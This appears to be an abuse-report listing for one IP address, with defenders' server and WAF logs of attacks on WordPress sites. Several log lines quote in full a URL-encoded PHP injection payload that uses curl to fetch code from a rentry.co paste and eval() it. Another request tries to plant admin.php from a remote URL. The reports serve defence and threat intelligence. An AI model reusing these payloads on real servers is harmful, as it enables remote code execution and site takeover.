gu-alvareza
2024-10-17 07:05:17
(1 month ago)
PHP.URI.Code.Injection
SQL Injection
Web App Attack
0xffffffff
2024-10-17 04:15:07
(1 month ago)
[2024-10-17 07:15:04.510421] [authz_core:error] [pid 4032988:tid 136937532819136] [client 154.38.185.190:0] AH01630: client denied by server configuration: /var/www/*/wp-22.php, referer http://*//wp-22.php?sfilename=admin.php&sfilecontent=<?php%20function%20get($url)%20{%20$ch%20=%20curl_init();%20curl_setopt($ch,%20CURLOPT_HEADER,%200);%20curl_setopt($ch,%20CURLOPT_RETURNTRANSFER,%201);%20curl_setopt($ch,%20CURLOPT_URL,%20$url);%20$data%20=%20curl_exec($ch);%20curl_close($ch);%20return%20$data;%20}%20$ok%20=%20%27?>%27;%20eval("$ok"%20.%20get(%27https://rentry.co/zokvg2mi/raw%27));%20?>&supfiles=admin.php , error_notes:double-slash , URI:'/wp-22.php?sfilename=admin.php&sfilecontent=<?php%20function%20get($url)%20{%20$ch%20=%20curl_init();%20curl_setopt($ch,%20CURLOPT_HEADER,%200);%20curl_setopt($ch,%20CURLOPT_RETURNTRANSFER,%201);%20curl_setopt($ch,%20CURLOPT_URL,%20$url);%20$data%20=%20curl_exec($ch);%20curl_close($ch);%20return%20$data;%20}%20$ok%20=%20%27?>%27;%20eval("$ok"%20.%20get(%27https://rentry.co/
Bad Web Bot
Web App Attack
paulshipley.com.au
2024-10-17 00:12:06
(1 month ago)
angleseaarthouse.com.au:443 154.38.185.190 - - [17/Oct/2024:11:06:30 +1100] "GET /wp-22.php?sfilename=admin.php&sfilecontent=<?php%20function%20get($url)%20{%20$ch%20=%20curl_init();%20curl_setopt($ch,%20CURLOPT_HEADER,%200);%20curl_setopt($ch,%20CURLOPT_RETURNTRANSFER,%201);%20curl_setopt($ch,%20CURLOPT_URL,%20$url);%20$data%20=%20curl_exec($ch);%20curl_close($ch);%20return%20$data;%20}%20$ok%20=%20%27?>%27;%20eval(\"$ok\"%20.%20get(%27https://rentry.co/zokvg2mi/raw%27));%20?>&supfiles=admin.php HTTP/1.1" 403 3898 "http://angleseaarthouse.com.au//wp-22.php?sfilename=admin.php&sfilecontent=<?php%20function%20get($url)%20{%20$ch%20=%20curl_init();%20curl_setopt($ch,%20CURLOPT_HEADER,%200);%20curl_setopt($ch,%20CURLOPT_RETURNTRANSFER,%201);%20curl_setopt($ch,%20CURLOPT_URL,%20$url);%20$data%20=%20curl_exec($ch);%20curl_close($ch);%20return%20$data;%20}%20$ok%20=%20%27?>%27;%20eval(\"$ok\"%20.%20get(%27https://rentry.co/zokvg2mi/raw%27));%20?>&supfiles=admin.php" "Go-http-client/1.1"
angl
...
Web App Attack
Apache
2024-10-16 05:03:04
(1 month ago)
(mod_security) mod_security (id:20000010) triggered by 154.38.185.190 (US/United States/vmi2170713.contaboserver.net): 5 in the last 300 secs
Brute-Force
Web App Attack
COMAITE
2024-10-15 23:50:30
(1 month ago)
Multiple web server 400 error codes from same source ip 154.38.185.190.
Web App Attack
Swiptly
2024-10-12 03:40:44
(1 month ago)
Multiple critical ModSecurity events
...
Web Spam
Bad Web Bot
london2038.com
2024-10-12 03:10:46
(1 month ago)
Probing for exploits
154.38.185.190 - - [12/Oct/2024:05:10:42 +0200] "GET //wp-22.php?sfilename=admin.php&sfilecontent=<?php%20function%20get($url)%20{%20$ch%20=%20curl_init();%20curl_setopt($ch,%20CURLOPT_HEADER,%200);%20curl_setopt($ch,%20CURLOPT_RETURNTRANSFER,%201);%20curl_setopt($ch,%20CURLOPT_URL,%20$url);%20$data%20=%20curl_exec($ch);%20curl_close($ch);%20return%20$data;%20}%20$ok%20=%20%27?>%27;%20eval(\x22$ok\x22%20.%20get(%27https://rentry.co/zokvg2mi/raw%27));%20?>&supfiles=admin.php HTTP/1.1" 301 169 "-" "Go-http-client/1.1"
154.38.185.190 - - [12/Oct/2024:05:10:43 +0200] "GET //rindex.php?action=add&parameter=admin.php%7Chttps://rentry.co/3fpi77xv/raw HTTP/1.1" 422 0 "-" "Go-http-client/1.1"
Hacking
Web App Attack
Ba-Yu
2024-10-10 07:17:44
(2 months ago)
General hacking/exploits/scanning
Web Spam
Hacking
Brute-Force
Exploited Host
Web App Attack
Anonymous
2024-10-10 06:32:43
(2 months ago)
Fail2Ban apache-noscript
Bad Web Bot
cmbplf
2024-10-10 06:25:45
(2 months ago)
200 requests to */.well-known/acme-challenge/*.php
Brute-Force
Bad Web Bot
robotstxt
2024-10-10 06:22:06
(2 months ago)
154.38.185.190 - - [10/Oct/2024:06:20:53 +0000] "GET //cgi-bin/class_api.php HTTP/2.0" 404 20 "http://www.wppodcast.org//cgi-bin/class_api.php#888xyz999" rt="0.072" "Go-http-client/2.0" "-" h="www.wppodcast.org" sn="www.wppodcast.org" ru="//cgi-bin/class_api.php" u="/index.php" ucs="-" ua="unix:/var/run/php/wppodcast82.sock" us="301" uct="0.000" urt="0.073"
154.38.185.190 - - [10/Oct/2024:06:20:53 +0000] "GET //cgi-bin/class_api.php HTTP/2.0" 404 20 "http://www.wppodcast.org//cgi-bin/class_api.php#888xyz999" "Go-http-client/2.0" "-"
154.38.185.190 - - [10/Oct/2024:06:21:20 +0000] "GET //cgi-bin/moon.php HTTP/2.0" 404 20 "http://www.wppodcast.org//cgi-bin/moon.php" rt="0.072" "Go-http-client/2.0" "-" h="www.wppodcast.org" sn="www.wppodcast.org" ru="//cgi-bin/moon.php" u="/index.php" ucs="-" ua="unix:/var/run/php/wppodcast82.sock" us="301" uct="0.000" urt="0.071"
154.38.185.190 - - [10/Oct/2024:06:21:46 +0000] "GET //cgi-bin/sgd.php HTTP/2.0" 404 20 "http://www.wppodcast.org//cgi-bin/sgd
...
Bad Web Bot
rnl
2024-10-10 04:17:54
(2 months ago)
2024/10/10 05:17:35 [error] 32687#0: *13838998 open() "/var/www/host/htdocs/cgi-bin/class_api.php" failed (2: No such file or directory), client: 154.38.185.190, server: host.[munged], request: "GET //cgi-bin/class_api.php HTTP/1.1", host: "host.[munged]"
2024/10/10 05:17:54 [error] 32686#0: *13839045 open() "/var/www/host/htdocs/cgi-bin/moon.php" failed (2: No such file or directory), client: 154.38.185.190, server: host.[munged], request: "GET //cgi-bin/moo
...
Web App Attack
FeG Deutschland
2024-10-10 00:06:01
(2 months ago)
Looking for CMS/PHP/SQL vulnerabilities - 13
Exploited Host
Web App Attack
el-brujo
2024-10-09 23:57:14
(2 months ago)
Cloudflare WAF: Request Path: //general.php Request Query: ?pd=1&mapname=admin.php&a=vx000&dstr=<?php%20function%20get($url)%20{%20$ch%20=%20curl_init();%20curl_setopt($ch,%20CURLOPT_HEADER,%200);%20curl_setopt($ch,%20CURLOPT_RETURNTRANSFER,%201);%20curl_setopt($ch,%20CURLOPT_URL,%20$url);%20$data%20=%20curl_exec($ch);%20curl_close($ch);%20return%20$data;%20}%20$ok%20=%20%27?>%27;%20eval("$ok"%20.%20get(%27https://rentry.co/zokvg2mi/raw%27));%20?> Host: ns2.elhacker.net userAgent: Go-http-client/1.1 Action: log Source: firewallManaged ASN Description: NL-811-40021 Country: US Method: GET Timestamp: 2024-10-09T23:57:14Z ruleId: 0f2da91cec674eb58006929e824b817c. Report generated by Cloudflare-WAF-to-AbuseIPDB (https://github.com/MHG-LAB/Cloudflare-WAF-to-AbuseIPDB).
Hacking
SQL Injection
Web App Attack
noxtec GmbH
2024-10-09 23:51:36
(2 months ago)
(apache-useragents) Failed apache-useragents trigger with match [redacted] from 154.38.185.190 (US/United States/vmi2170713.contaboserver.net)
Bad Web Bot